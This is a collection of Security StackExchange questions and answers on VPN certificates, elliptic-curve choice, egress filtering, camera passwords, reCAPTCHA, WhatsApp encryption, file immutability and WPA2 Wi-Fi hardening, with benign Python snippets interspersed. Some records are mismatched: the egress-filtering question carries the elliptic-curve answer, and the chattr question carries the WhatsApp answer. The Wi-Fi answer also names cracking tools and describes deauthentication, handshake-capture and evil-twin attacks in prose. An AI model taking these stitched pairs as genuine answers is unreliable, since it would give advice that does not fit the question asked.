demonstrate that its public key has been signed by the private key a CA. In the case of SSH, the prior knowledge normally comes from having contacted the server previously: the client records the server's public key and refuses to proceed if the server's public key is not the recorded one. (This also exists for HTTPS with certificate pinning .) On the first connection, it's up to the SSH user to verify the public key. There is no standard followed by VPN software. You need to read the documentation of your VPN software. In enterprise deployments, it is common to either deploy the server certificate to employees' computers alongside the VPN software, or require the employee to make a first connection to the VPN from inside the company network where a MITM attack is not feared. The certificate is then stored in the VPN software configuration and the VPN client will refuse to connect if the server's public key changes. If you're deploying a VPN service for your own use or for your organization's use, you should take care of provisioning the server certificate at installation time, before you go out in the wild. If a secure network is not available, you'll need to rely on some other communication channel to send the certificate. It could be an email, if that's how you identify users, but it would be best to rely on a pre-existing infrastructure such as GPG keys (send the certificate in a signed email) — which of course only shifts the problem to how to verify the GPG key. If you're using a cloud-based VPN service, that service should provide you a way to verify their certificate (e.g. a web page served over HTTPS) and should document how to install the certificate or how to verify it on first use. Again, there isn't a single process that all VPN software follow. | {
"source": [
"https://security.stackexchange.com/questions/77241",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/61028/"
]
} |
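The "record the key on first contact, refuse if it later changes" behaviour the answer above describes for SSH (and for certificate pinning) can be sketched in a few lines of Python. This is an illustration only: the pin-file name, the use of a SHA-256 certificate fingerprint, and example.org are assumptions, and a real deployment should verify the first-seen fingerprint out of band, as the answer stresses.

```python
import hashlib
import json
import ssl
from pathlib import Path

PIN_FILE = Path("known_servers.json")   # plays the role of ~/.ssh/known_hosts

def fingerprint(host: str, port: int = 443) -> str:
    """Fetch the server's certificate over the network and hash it."""
    pem = ssl.get_server_certificate((host, port))
    der = ssl.PEM_cert_to_DER_cert(pem)
    return hashlib.sha256(der).hexdigest()

def check_pin(host: str, port: int = 443) -> bool:
    pins = json.loads(PIN_FILE.read_text()) if PIN_FILE.exists() else {}
    seen = fingerprint(host, port)
    key = "%s:%d" % (host, port)
    if key not in pins:                  # first contact: trust on first use,
        pins[key] = seen                 # ideally after verifying the value out of band
        PIN_FILE.write_text(json.dumps(pins, indent=2))
        return True
    return pins[key] == seen             # afterwards: refuse if the certificate changed

if __name__ == "__main__":
    print(check_pin("example.org"))      # requires network access; the host is illustrative
```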
78,621 | I am currently renewing an SSL certificate, and I was considering switching to elliptic curves. Per Bernstein and Lange , I know that some curves should not be used but I'm having difficulties selecting the correct ones in OpenSSL: $ openssl ecparam -list_curves
secp112r1 : SECG/WTLS curve over a 112 bit prime field
secp112r2 : SECG curve over a 112 bit prime field
secp128r1 : SECG curve over a 128 bit prime field
secp128r2 : SECG curve over a 128 bit prime field
secp160k1 : SECG curve over a 160 bit prime field
secp160r1 : SECG curve over a 160 bit prime field
secp160r2 : SECG/WTLS curve over a 160 bit prime field
secp192k1 : SECG curve over a 192 bit prime field
secp224k1 : SECG curve over a 224 bit prime field
secp224r1 : NIST/SECG curve over a 224 bit prime field
secp256k1 : SECG curve over a 256 bit prime field
secp384r1 : NIST/SECG curve over a 384 bit prime field
secp521r1 : NIST/SECG curve over a 521 bit prime field
prime192v1: NIST/X9.62/SECG curve over a 192 bit prime field
prime192v2: X9.62 curve over a 192 bit prime field
prime192v3: X9.62 curve over a 192 bit prime field
prime239v1: X9.62 curve over a 239 bit prime field
prime239v2: X9.62 curve over a 239 bit prime field
prime239v3: X9.62 curve over a 239 bit prime field
prime256v1: X9.62/SECG curve over a 256 bit prime field
sect113r1 : SECG curve over a 113 bit binary field
sect113r2 : SECG curve over a 113 bit binary field
sect131r1 : SECG/WTLS curve over a 131 bit binary field
sect131r2 : SECG curve over a 131 bit binary field
sect163k1 : NIST/SECG/WTLS curve over a 163 bit binary field
sect163r1 : SECG curve over a 163 bit binary field
sect163r2 : NIST/SECG curve over a 163 bit binary field
sect193r1 : SECG curve over a 193 bit binary field
sect193r2 : SECG curve over a 193 bit binary field
sect233k1 : NIST/SECG/WTLS curve over a 233 bit binary field
sect233r1 : NIST/SECG/WTLS curve over a 233 bit binary field
sect239k1 : SECG curve over a 239 bit binary field
sect283k1 : NIST/SECG curve over a 283 bit binary field
sect283r1 : NIST/SECG curve over a 283 bit binary field
sect409k1 : NIST/SECG curve over a 409 bit binary field
sect409r1 : NIST/SECG curve over a 409 bit binary field
sect571k1 : NIST/SECG curve over a 571 bit binary field
sect571r1 : NIST/SECG curve over a 571 bit binary field
c2pnb163v1: X9.62 curve over a 163 bit binary field
c2pnb163v2: X9.62 curve over a 163 bit binary field
c2pnb163v3: X9.62 curve over a 163 bit binary field
c2pnb176v1: X9.62 curve over a 176 bit binary field
c2tnb191v1: X9.62 curve over a 191 bit binary field
c2tnb191v2: X9.62 curve over a 191 bit binary field
c2tnb191v3: X9.62 curve over a 191 bit binary field
c2pnb208w1: X9.62 curve over a 208 bit binary field
c2tnb239v1: X9.62 curve over a 239 bit binary field
c2tnb239v2: X9.62 curve over a 239 bit binary field
c2tnb239v3: X9.62 curve over a 239 bit binary field
c2pnb272w1: X9.62 curve over a 272 bit binary field
c2pnb304w1: X9.62 curve over a 304 bit binary field
c2tnb359v1: X9.62 curve over a 359 bit binary field
c2pnb368w1: X9.62 curve over a 368 bit binary field
c2tnb431r1: X9.62 curve over a 431 bit binary field
wap-wsg-idm-ecid-wtls1: WTLS curve over a 113 bit binary field
wap-wsg-idm-ecid-wtls3: NIST/SECG/WTLS curve over a 163 bit binary field
wap-wsg-idm-ecid-wtls4: SECG curve over a 113 bit binary field
wap-wsg-idm-ecid-wtls5: X9.62 curve over a 163 bit binary field
wap-wsg-idm-ecid-wtls6: SECG/WTLS curve over a 112 bit prime field
wap-wsg-idm-ecid-wtls7: SECG/WTLS curve over a 160 bit prime field
wap-wsg-idm-ecid-wtls8: WTLS curve over a 112 bit prime field
wap-wsg-idm-ecid-wtls9: WTLS curve over a 160 bit prime field
wap-wsg-idm-ecid-wtls10: NIST/SECG/WTLS curve over a 233 bit binary field
wap-wsg-idm-ecid-wtls11: NIST/SECG/WTLS curve over a 233 bit binary field
wap-wsg-idm-ecid-wtls12: WTLS curvs over a 224 bit prime field
Oakley-EC2N-3:
IPSec/IKE/Oakley curve #3 over a 155 bit binary field.
Not suitable for ECDSA.
Questionable extension field!
Oakley-EC2N-4:
IPSec/IKE/Oakley curve #4 over a 185 bit binary field.
Not suitable for ECDSA.
Questionable extension field! Could a kind cryptographer point out to me which curves are still considered safe? | You are misreading Bernstein and Lange's advice (admittedly, their presentation is a bit misleading, with the scary red "False" tags). What they mean is not that some curves are inherently unsafe, but that safe implementation of some curves is easier than for others (e.g. with regards to library behaviour when it encounters something which purports to be the encoding of a valid curve point, but is not). What you really want is a curve such that: the software which you will entrust with your private key (your SSL server) is properly implemented and will not leak details about your private key; interoperability will be achieved. For a SSL server certificate, an "elliptic curve" certificate will be used only with digital signatures (ECDSA algorithm). The server will sign only messages that it generates itself; and, in any case, the only "private" operation involving a curve in ECDSA is multiplication of the conventional base point (hardcoded, since it is part of the curve definition, hence correct) by a random value that the server generates. Therefore, in your use case, there is no risk of private key leakage that would be specific to the used curve. If your SSL implementation is poor, it will be poor for all curves, not for just some of them. "Interoperability" means that you would probably prefer it if SSL clients can actually connect to your server; otherwise, having a SSL server would be rather pointless. This simplifies the question a lot: in practice, average clients only support two curves, the ones which are designated in so-called NSA Suite B : these are NIST curves P-256 and P-384 (in OpenSSL, they are designated as, respectively, "prime256v1" and "secp384r1"). If you use any other curve, then some widespread Web browsers (e.g. Internet Explorer, Firefox...) will be unable to talk to your server. Use P-256 to minimize trouble. If you feel that your manhood is threatened by using a 256-bit curve where a 384-bit curve is available, then use P-384: it will increases your computational and network costs (a factor of about 3 for CPU, a few extra dozen bytes on the network) but this is likely to be negligible in practice (in a SSL-powered Web server, the heavy cost is in "Web", not "SSL"). | {
"source": [
"https://security.stackexchange.com/questions/78621",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/6822/"
]
} |
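For completeness, here is a hedged sketch of generating a P-256 (prime256v1/SECP256R1) key and CSR with the third-party Python cryptography package. Using that package (rather than the OpenSSL command line from the question), the example.org common name and the output file names are all assumptions for illustration; recent versions of the package no longer require an explicit backend argument.

```python
# pip install cryptography  (third-party package; an assumption, not part of the question)
from cryptography import x509
from cryptography.hazmat.primitives import hashes, serialization
from cryptography.hazmat.primitives.asymmetric import ec
from cryptography.x509.oid import NameOID

# P-256 is SECP256R1 here, prime256v1 in the OpenSSL listing above, and NIST P-256 elsewhere.
key = ec.generate_private_key(ec.SECP256R1())

csr = (
    x509.CertificateSigningRequestBuilder()
    .subject_name(x509.Name([x509.NameAttribute(NameOID.COMMON_NAME, "www.example.org")]))
    .sign(key, hashes.SHA256())
)

with open("server.key", "wb") as f:       # illustrative file names
    f.write(key.private_bytes(
        serialization.Encoding.PEM,
        serialization.PrivateFormat.TraditionalOpenSSL,
        serialization.NoEncryption(),
    ))
with open("server.csr", "wb") as f:
    f.write(csr.public_bytes(serialization.Encoding.PEM))
```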
78,630 | Suppose your Aunt or Uncle is easily fooled by phishing attempts and their computer has multiple root kits and key loggers running. Assume their computing habits will never change. Looking at his wireless router you can see that he only visits a few dozen or a few hundred websites multiple times in a month. Instead of trying to keep the bad guys out, set up the firewall's default outbound rule to be block (deny/reject) everything to prevent the bad guys from getting out. If this non-technical relative had a simple python program running with an ssh connection into the firewall, the program could monitor the IP addresses as they get blocked. The program would then ask the user if they want to access 72.21.211.176 Amazon.com (USA). If the user says yes, the program might then ask: Allow outbound access to all 72.21. . networks? This is an attempt to save some time creating a whitelist. I know opinions vary as to the value of egress filtering. But with all the technology advances in the last 20 years, I find it frustrating that there is not a simple way for non-technical users to prevent sending data to that village in Wales (Llanfairpwllgwyngyll) that we all know is full of nation state hackers. http://en.wikipedia.org/wiki/Llanfairpwllgwyngyll Since I am more of a SQL developer than a security expert, I am posting this to see if this would realistically help secure the home network in the example above. Of course the solution is not perfect, but it seems like it would help. This thought came about after reading about DGA malware that have been known to create thousands of new domains per second and realizing that attackers are way more sophisticated than I imagined. http://en.wikipedia.org/wiki/Domain_generation_algorithm UPDATE As both answers indicate, this is not a good way to approach the problem. Too many IPs in the world and the user can't be trusted to allow only safe domains. | You are misreading Bernstein and Lange's advice (admittedly, their presentation is a bit misleading, with the scary red "False" tags). What they mean is not that some curves are inherently unsafe, but that safe implementation of some curves is easier than for others (e.g. with regards to library behaviour when it encounters something which purports to be the encoding of a valid curve point, but is not). What you really want is a curve such that: the software which you will entrust with your private key (your SSL server) is properly implemented and will not leak details about your private key; interoperability will be achieved. For a SSL server certificate, an "elliptic curve" certificate will be used only with digital signatures (ECDSA algorithm). The server will sign only messages that it generates itself; and, in any case, the only "private" operation involving a curve in ECDSA is multiplication of the conventional base point (hardcoded, since it is part of the curve definition, hence correct) by a random value that the server generates. Therefore, in your use case, there is no risk of private key leakage that would be specific to the used curve. If your SSL implementation is poor, it will be poor for all curves, not for just some of them. "Interoperability" means that you would probably prefer it if SSL clients can actually connect to your server; otherwise, having a SSL server would be rather pointless. 
This simplifies the question a lot: in practice, average clients only support two curves, the ones which are designated in so-called NSA Suite B : these are NIST curves P-256 and P-384 (in OpenSSL, they are designated as, respectively, "prime256v1" and "secp384r1"). If you use any other curve, then some widespread Web browsers (e.g. Internet Explorer, Firefox...) will be unable to talk to your server. Use P-256 to minimize trouble. If you feel that your manhood is threatened by using a 256-bit curve where a 384-bit curve is available, then use P-384: it will increases your computational and network costs (a factor of about 3 for CPU, a few extra dozen bytes on the network) but this is likely to be negligible in practice (in a SSL-powered Web server, the heavy cost is in "Web", not "SSL"). | {
"source": [
"https://security.stackexchange.com/questions/78630",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/64795/"
]
} |
78,684 | This question has a follow-up question here: How to securely encrypt data with a public-private key encryption scheme, but also allow decryption if the private key is lost? TL;DR: Can I use plaintext passwords for a device which doesn't hold any sensitive data? No, because password reuse. Okay, can I use prehashed passwords for a device which doesn't hold any sensitive data? No, because database administrators can still use the prehashed passwords to gain access. Then what can I use? As far as I'm aware, plaintext passwords are not secure. Yet I don't see a way around using them. I have two questions: In the following situation, is the use of plaintext passwords insecure? In the following situation, is the use of plaintext passwords unavoidable? We're developing new cameras to be used for monitoring and security of private homes. I'll skip their uses, but they're intended not just as security cameras against things like break-ins, but also for other domestic uses (like checking if your children are still in bed, and not wandering about in the evening). The security plan is as such: Each camera has a (likely to be unique) default password. The password is generated per camera, but duplicates are possible. We store the default passwords in a database for support (both testing and "you lost your default password card, but do have a receipt of purchase, here's your default password"). Each camera is reachable from anywhere in the world with minimum set-up. With the default password, one can access the camera and change the password. With a custom password, one can access the camera and view the stream of the camera. The default password is rejected if a custom password is set. The default password does not allow viewing of the camera stream. With physical access to the camera, it's possible to factory reset the camera. This clears the custom password and reinstates the default password. So far, I personally do not see any security issues. Yes, we store plaintext passwords, but they do not allow access on configured cameras. They only allow access on cameras that are plugged in but not yet configured. It would take a mighty scanner to detect and take over a camera that was just plugged in, but not configured yet. Even if it was taken over, the customer could just factory reset the device and try again. Now, for the next change... We wish to simplify the accessing of the cameras over multiple devices (tablet, phone, PC?). To do this, we store the custom password in our database. When one wishes to access their camera, they log in to our platform (this password we do not store plaintext). They can retrieve a list of cameras and plaintext passwords. They can then use these passwords to connect to the camera. The handling of the plaintext passwords happens automatically in an app, but with a rooted device, it should be easy to find out what data you're receiving. We store custom passwords in the database too. Custom passwords are retrieved after authenticating to the platform (via properly managed credentials). Custom passwords are stored per user; if two people add the same camera to their account with the same password, it will work. If one of them then changes the password on the camera, the other one will get a "enter password" dialog the next time they try to access the camera. Storing these passwords plaintext, it suddenly becomes possible, in the event of a database breach, to access all configured cameras from anywhere. Is this a security risk? 
The worst one can do is format the SD card (and control the camera like any other PTZ camera). One could even start the update process, but all that would do is install updates from the update server(s). Unless you're nearby the camera to intercept traffic and alter the received firmware, the camera will just update to our latest version. If an attacker has physical access to the device, it doesn't matter what security we have; they could factory reset, set up their own password, then update from SD card. Result is a camera that can do anything it damn well pleases. I'm willing to allow a successful (unrecoverable takeover; e.g. bricking of the camera) hack attempt only by physical access. This because we cannot make the cameras resistant to weaponry - if someone can destroy a camera with good use of a hammer, protecting against physical attack vectors is a moot point. In the described situation, is the use of plaintext passwords insecure? In the described situation, is the use of plaintext passwords unavoidable? EDIT: A suggestion that has been to made is to make custom passwords hashed. This removes a risk that in the event of a database breach, people would be suffering access breaches via password reuse. @Victor pointed out that the current security plan allows employees to access the cameras. Removal of the password synchronization feature allows us to remove the password from the database, removing the security risk. However, we wish to make an online video storage service to allow video playback in event of camera theft. This requires a camera password of sorts. Passing this password and storing it in a database opens the situation back up for employees using the passwords in the database to access customer cameras. A new plan I'm thinking of involves having the customer using the app to, via a local connection with the camera, generate an access token that allows, from anywhere, but only with a specific account (of which only the company knows the password), access to the video feed only. This allows such an online video storage service. However, it also allows use of this access token and the special account to, once again, access the camera feed. And we're back at a security risk. I don't know how to solve this... EDIT: By combining all of your suggestions (many thanks), I was able to draft a new security plan. To prevent moving the goal posts, I have created a new question for this: How to securely encrypt data with a public-private key encryption scheme, but also allow decryption if the private key is lost? | It's a long question but I think your main point is this: We wish to simplify the accessing of the cameras over multiple devices (tablet, phone, PC?). First have a look how SSH keys work. That would work for you mostly as it is. At first the customers public key is added into his camera during the initial configuration. He can authenticate himself using his private key that is stored on his device. Every of his devices (PC, Tablet, Mobile, ...) has its own key. If he likes to access his camera from a new device, he starts a request from this device with the public key from his device. Goes back to his first device and grant the request by adding the public key into the camera. From now both clients can access. You can revoke access by removing a key. Also you can store access levels with the key. You can store all public keys on your server. If you server gets hacked, only public keys can be stolen. All the cameras are still secure. 
If a customer gets hacked, he revokes his public key on your server, performs a factory reset on his cameras and adds his new key. | {
"source": [
"https://security.stackexchange.com/questions/78684",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/55685/"
]
} |
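Below is a minimal sketch of the SSH-style enrolment and challenge flow the answer above proposes, written in Python with Ed25519 keys from the third-party cryptography package. The class name, the challenge/response shape and the choice of Ed25519 are illustrative assumptions, not the camera product's actual protocol.

```python
# pip install cryptography  (third-party package); a sketch of the SSH-style enrolment
# and challenge flow suggested above, not the product's actual protocol.
import os
from cryptography.exceptions import InvalidSignature
from cryptography.hazmat.primitives.asymmetric.ed25519 import Ed25519PrivateKey

class Camera:
    def __init__(self):
        self.enrolled = {}   # device name -> Ed25519 public key

    def enrol(self, device, public_key):
        """Done locally during initial configuration, or approved from an already-trusted device."""
        self.enrolled[device] = public_key

    def revoke(self, device):
        self.enrolled.pop(device, None)

    def challenge(self):
        return os.urandom(32)            # fresh nonce per login attempt

    def verify(self, device, challenge, signature):
        key = self.enrolled.get(device)
        if key is None:
            return False
        try:
            key.verify(signature, challenge)
            return True
        except InvalidSignature:
            return False

# The phone keeps its private key; the camera (and any cloud service) only ever
# store public keys, so a server breach does not expose camera credentials.
phone_key = Ed25519PrivateKey.generate()
cam = Camera()
cam.enrol("alice-phone", phone_key.public_key())
nonce = cam.challenge()
print(cam.verify("alice-phone", nonce, phone_key.sign(nonce)))   # True
```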
78,758 | What additional security can a "password minimum age" provide? For example: the user can change their password only after 24 hours have elapsed since the last password change. | It is normally used in conjunction with a setting to prevent re-use of X number of previous passwords - the minimum password age is intended to discourage users from cycling through their previous passwords to get back to a preferred one. Obviously the effectiveness is dependent on both the minimum password age setting and the users. | {
"source": [
"https://security.stackexchange.com/questions/78758",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/65968/"
]
} |
78,802 | What could be the threats of having ports open, after performing an nmap scan and identifying the open ports? I already searched for some answers to this question, but couldn't find anything specific. Is there any particular issue with each and every port, or are those threats common to all of them? | An open port is an attack surface. The daemon that is listening on a port could be vulnerable to a buffer overflow or another remotely exploitable vulnerability. An important principle in security is reducing your attack surface and ensuring that servers have the minimum number of exposed services. | {
"source": [
"https://security.stackexchange.com/questions/78802",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/66002/"
]
} |
78,807 | Google has released a new form of captcha identification of bots, that asks the user to click a single checkbox. It uses image-based verification only if necessary. Could someone please explain to me as to how such a program differentiates a human from a bot? There is a program here that can perform mouse clicks on your computer. It can not be detected by a web-based program with no access to your program files. It should be possible to write an undetectable Windows executable that can tick the check box. One could also randomize the response time of the program. After a few (successful) attempts, the captcha will ask for image verification. Maybe that can be solved by an AI that searches the images using Google Image Search (by image), and makes guesses based on the filenames of 'visually similar' images. If the images used are not from the net, then they would be limited in number, and one could create a database of them. Could someone clarify whether these approaches could actually work? | This isn't really a great question for stackexchange as Google is keeping its algorithms secret so all we can really do is make guesses about how it works, but my understanding is that the new system will analyze your activity across all of Google's services (and possibly other sites that Google has some control over, such as websites that have Google ads). Thus, it is likely that the checks are not limited to just the page that has the checkbox on it. For example, if they detect that your computer/IP address you are using was also used in the past to do things that a normal human would do - things like checking Gmail, searching on Google search, uploading files to Drive, sharing photos, browsing the web etc. - then it can probably be reasonably sure that you are a human and allow you to skip the image verification. On the other hand, if it can't associate your computer with any previous human-like activity, then it would be more suspicious and give you the image verification. Though the mouse behavior as it clicks the checkbox may be one factor it analyzes, there is almost certainly a lot more to it. Again, we don't know for sure how it works. This is just my best guess based on what little Google has said: While the new reCAPTCHA API may sound simple, there is a high degree
of sophistication behind that modest checkbox. CAPTCHAs have long
relied on the inability of robots to solve distorted text. However,
our research recently showed that today’s Artificial Intelligence
technology can solve even the most difficult variant of distorted text
at 99.8% accuracy. Thus distorted text, on its own, is no longer a
dependable test. To counter this, last year we developed an Advanced Risk Analysis
backend for reCAPTCHA that actively considers a user’s entire
engagement with the CAPTCHA—before, during, and after—to determine
whether that user is a human. This enables us to rely less on typing
distorted text and, in turn, offer a better experience for users. We
talked about this in our Valentine’s Day post earlier this year. To me the point about "before, during, and after use" is a strong hint that they analyze previous browsing behavior, but my interpretation could be wrong. Here's a quote from WIRED: Instead of depending upon the traditional distorted word test,
Google’s “reCaptcha” examines cues every user unwittingly provides: IP
addresses and cookies provide evidence that the user is the same
friendly human Google remembers from elsewhere on the Web. And Shet
says even the tiny movements a user’s mouse makes as it hovers and
approaches a checkbox can help reveal an automated bot. There is another thread on stackoverflow discussing this as well: https://stackoverflow.com/questions/27286232/how-does-new-google-recaptcha-work As for image verification, you're not going to be able to find those images with reverse image search, or compile a database of them. They are usually random street signs or house numbers captured by Google's Street View cars, or words from books that were scanned for the Google Books project. There is a good purpose behind this - Google actually makes use of what people type into reCaptcha to improve their own databases and train OCR algorithms. reCaptcha gives the same image to a number of users, and if they all agree on what it says, then the picture becomes training data for Google's AI. From wikipedia: The reCAPTCHA service supplies subscribing websites with images of
words that optical character recognition (OCR) software has been
unable to read. The subscribing websites (whose purposes are generally
unrelated to the book digitization project) present these images for
humans to decipher as CAPTCHA words, as part of their normal
validation procedures. They then return the results to the reCAPTCHA
service, which sends the results to the digitization projects. reCAPTCHA has worked on digitizing the archives of The New York Times
and books from Google Books.[3] As of 2012, thirty years of The New
York Times had been digitized and the project planned to have
completed the remaining years by the end of 2013. The now completed
archive of The New York Times can be searched from the New York Times
Article Archive, where more than 13 million articles in total have
been archived, dating from 1851 to the present day. | {
"source": [
"https://security.stackexchange.com/questions/78807",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/64646/"
]
} |
79,070 | Slightly old news: Whatsapp Just Switched on End-to-End Encryption for Hundreds of Millions of Users Is there any test that I can perform to verify that WhatsApp is indeed using end-to-end encryption between my and another Android phone? | There isn't any quick check you can perform in order to be sure that end-to-end encryption is used. Even if you manage to get this confirmation, then you have to make sure that the used encryption keys never left your device (and the device of your friend). If end-to-end encryption is used, but WhatsApp or someone else has access to the encryption keys, the chat is no longer confidential. There is some available information which can allow a security researcher to start investigating the matter: The encryption software is known and the code is open source (even if we do not know what changes were made to the WhatsApp implementation) WhatsApp will integrate the open-source software Textsecure, created by privacy-focused non-profit Open Whisper Systems, which scrambles messages with a cryptographic key that only the user can access and never leaves his or her device TextSecure GitHub P.S.: There is at least one way to tell if they are not using end-to-end encryption and parsing the contents of your messages. Some time ago, a security researcher discovered that URLs sent in Skype messages are accessed from Microsoft IP addresses ( link ). You can try the same thing by setting up a web server and sending some unique URLs on WhatsApp. | {
"source": [
"https://security.stackexchange.com/questions/79070",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/35368/"
]
} |
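The P.S. in the answer above describes a canary-URL test: send a link that exists nowhere but inside the chat, then watch who fetches it. A rough sketch of such a canary server is below; the port, path layout and hostname placeholder are assumptions for illustration, and a hit from an IP other than the recipient's only suggests, rather than proves, that message contents were read in transit.

```python
#!/usr/bin/env python3
"""Canary-URL sketch: log every request for a unique, unguessable link."""
import secrets
from http.server import BaseHTTPRequestHandler, HTTPServer

token = secrets.token_urlsafe(16)
print(f"Send only in a chat message: http://<your-public-host>:8080/canary/{token}")

class CanaryHandler(BaseHTTPRequestHandler):
    def do_GET(self):
        # Record who fetched the link and which path they requested.
        print(f"HIT from {self.client_address[0]} for {self.path}")
        self.send_response(200)
        self.end_headers()
        self.wfile.write(b"ok")

if __name__ == "__main__":
    HTTPServer(("0.0.0.0", 8080), CanaryHandler).serve_forever()
```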
79,072 | Recently, a website I hosted (a wordpress site) for a friend got hacked and all php pages had added code at the bottom in the form of echo base64_encode(...); . Thus there were unwanted ads on very page. The webserver is apache2 running suphp. I imagine a recursive chattr +i on all php files that don't need to be modified/upload by a website would protect against such an attack. Am I right to believe this and would there be any good reason not to do this? | There isn't any quick check you can perform in order to be sure that end-to-end encryption is used. Even if you manage to get this confirmation, then you have to make sure that the used encryption keys never left your device (and the device of your friend). If end-to-end encryption is used, but WhatsApp or someone else has access to the encryption keys, the chat is no longer confidential. There is some available information which can allow a security researcher to start investigating the matter: The encryption software is known and the code is open source (even if we do not know what changes were made to the WhatsApp implementation) WhatsApp will integrate the open-source software Textsecure, created by privacy-focused non-profit Open Whisper Systems, which scrambles messages with a cryptographic key that only the user can access and never leaves his or her device TextSecure GitHub P.S.: There is at least one way to tell if they are not using end-to-end encryption and parsing the contents of your messages. Some time ago, a security researcher discovered that URLs sent in Skype messages are accessed from Microsoft IP addresses ( link ). You can try the same thing by setting up a web server and sending some unique URLs on WhatsApp. | {
"source": [
"https://security.stackexchange.com/questions/79072",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/22264/"
]
} |
79,187 | What is the best home wireless network encryption algorithm to use? I realize the best answer will probably change over time, and hopefully people can provide updated answers as new standards come out. So far, my knowledge, as of early 2015 is: WEP - Horrible / outdated, but still a bit better than nothing (or may even be worse than nothing because it provides a false sense of security as pointed out below). WPA - Provides some security, but probably better to go with WPA2. WPA2 - Pretty good (especially with AES encryption), but still not perfect. It is the best I know though for a home network. Are there any better encryption standards to use than WPA2 for a home wireless network, or is that the best there is? If it is the best there is, is it easy to hack? If it is true as others indicate that WPA-2 is not adequate, and nothing better exists, it seems like it would be a good idea, perhaps even a good money making opportunity for someone to develop something better! Edit (July 1, 2019): WPA3 is now a better option than WPA2. | From a security perspective, I think you are asking the wrong question. WPA2 is the basic answer. But it's entirely incomplete! A more complete answer will view WPA2 as one component of your wireless network defence. Of course there's strong encryption methods using certificates/vpn etc but these are too difficult for most people to set up and are usually reserved for businesses. So let's assume WPA-2 is the 'best' answer to the basic question. However... as you'll see, there's many weaker points that attackers go for, that ultimately reveal your WPA2 password, so I've included them in the points below. I'm assuming many people will land on this page and see answers saying
'yeah just use a good password and WPA2 encryption', which is bad
advice. Your WPA2 network is still completely vulnerable, as you
will see: the main thing you can do, is be the hardest person to hack around you. That's the biggest deterrent. If I'm going to hack you, but you're taking too long or are too expensive to crack , I'll try the next person. This will require some playing around in your router settings. I'll assume you would never use WEP . 10 minutes on youtube and your mom can crack it. Switch off WPS. this is EXTREMELY vulnerable to brute force attacks and can be hacked in seconds, even if you are using WPA2 with a ridiculously complex password . Tools like reaver and revdk3 or bully make light work of these. You're only a little bit more protected if your router supports rate-limiting, which slows down, but doesn't prevent brute force attacks against your routers pin. Better to be safe and just switch WPS off and be 100% safe against these attacks. turn off remote access , DMZ, UPNP, unecessary port forwarding turn on, any inbuilt intrusion detection systems, MAC address filtering (tedious to set up if visitors to your house want access to your wifi (you will have to add your friends device to the router's MAC white-list to enable access) This can be hacked by faking a MAC address easily, and getting your MAC is also easy with an airodump-ng scan, but nevertheless, this will slow down attackers , requires them to be near a client device (mobile phone, or laptop in the whitelist) It will be pretty effective against some remote attacks. have a very long, non-human, complex password. If you have ever tried to decrypt a password you'll know that it gets exponentially harder to crack a password the more complex, less predictable and longer it is. If your password even remotely resembles a word, or something that could probably be a set of words (see: markov chains) you are done. Also don't bother adding numbers to the end of passwords, then a symbol... these are easily hacked with a dictionary attack with rules that modify the dictionary to flesh it out to cover more passwords. This will take each word or words in the dictionary, and add popular syntax and structures, such as passwords that look like this 'capital letter, lowercase letters, some numbers then a symbol. Cat111$, Cat222# or whatever the cracker wants. These dictionaries are huge, some can be investigated on crackstation or just have a look at Moxie Marlinspikes' cloudcrackr.com. The goal here is to be 'computationally expensive'. If you cost too much to crack using ultra high speed cloud based cracking computers then you're safe against almost anyone. So ideally you want to use the maximum 64 characters for your password, and have it look like the most messed up annoying symbol infused piece of incoherent upper-lower-case dribble you've ever seen. You'll probably be safe after 14 characters though, there's quite a bit of entropy here, but it's far easier to add characters than it is to decrypt. change your routers default password and SSID . nobody does this, but everyone should. It's literally the dumbest thing. Also, don't get lazy. and don't keep the router's model number in the SSID, that's just asking for trouble. update your router's firmware. Also, if your router is old. throw it out and buy a newer one, because it's likely your router is on some website like routerpwn.com/ and you've already lost the battle. Old routers are full of bugs, can be easily denial-of-serviced, don't usually have firewalls or intrusion detection systems and don't usually have brute-force WPS rate limiting among other things. just get a new one. 
learn about evil-twin hacks . The easiest way to protect against this is to stop your device from auto-connecting. However, this might still snag you. Become familiar with software like wiphishing and airbase-ng, these apps clone your router, then Denial of service your router making your device connect to the attackers cloned router, allowing them to intercept your traffic. They'll usually try to phish the WPA2 password from you here. You're safer from these attacks if you actually know what your router's web console looks like , because the default phishing pages that come with these types of apps are usually pretty old looking, however a sophisticated attacker can create a good landing page. Put simply, if your 'router' ever wants you to type in a password don't type it! You'll only ever be asked when you are creating the password, when you specifically log in to the 192.168.0.1 or 10.1.1.1 user interface, then you are being phished and it's game over. To prevent this attack you could also artificially reduce the range of your router. pull out the antenna's and create a little faraday cage around it, leaving a small area that points to your most ideal wifi position. Alternatively, just use a cable to your laptop or computer until the attacker gives up. handshake attacks are pretty popular, this is where the attacker sends a deauthorisation packet to anyone connected to your router using your password, then when that device (say an iPhone) tries to reconnect, it captures the '4 way handshake' which let's the device and router authenticate using your WPA2 password. This is what hackers use to crack offline using the password attacks in point 6. However if you have used a strong password (as described in point 6) then you've mitigated this attack already . So i've focussed on router based defence, but there's actually even easier ways to be attacked. If the attacker knows who you are, you're screwed. With a tiny bit of social engineering , they can find your facebook your email or some other way to contact you and insert some malicious snippet of code that's invisible and hijack your entire computer, which therefore lets them simply check the wifi settings in your computer and obtain the ultra strong password you've spent so long making. One popular method is to send you an email that's junk, and keep sending it until you click unsubscribe, as you usually would for junk mail, except this link is exactly the worst thing to do. You've broken the cardinal law of email. Don't click links in emails. If you have to click one, at least check where it goes first. If someone has access to any of your devices, or plugs/gets your to plug a device into your laptop, you're gone. things like usb sticks 'usb rubber ducky' can compromise your computer and reveal your WPA2 password to a relatively novice hacker. if you use a wireless keyboard, and you live near an attacking neighbour , they can use things like keysweeper to compromise your wifi, and a lot more. This could be creatively used with an evil twin attack to increase the likelihood you type your password (it listens to wireless keyboard signals). The way to prevent this attack is to not use a wireless microsoft keyboard. 
